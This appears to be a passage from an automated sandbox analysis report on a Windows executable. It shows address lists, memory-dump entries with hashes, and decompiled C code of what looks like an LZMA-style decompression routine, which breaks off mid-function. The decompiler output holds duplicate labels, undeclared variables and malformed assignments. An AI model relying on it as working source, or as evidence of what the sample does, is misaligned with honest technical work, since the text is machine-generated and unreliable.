                                                  0x004060d3
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060eb
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406142
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x00406147
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406164
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061aa
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406852
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x00406888
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00000000
                                                  0x00406a44
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b0
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00000000
                                                  0x00406261
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406244
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x004065ac
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x004068bc
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00406a5a
                                                  0x00406a60
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                  • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                                  • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                  • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406473, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406473() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
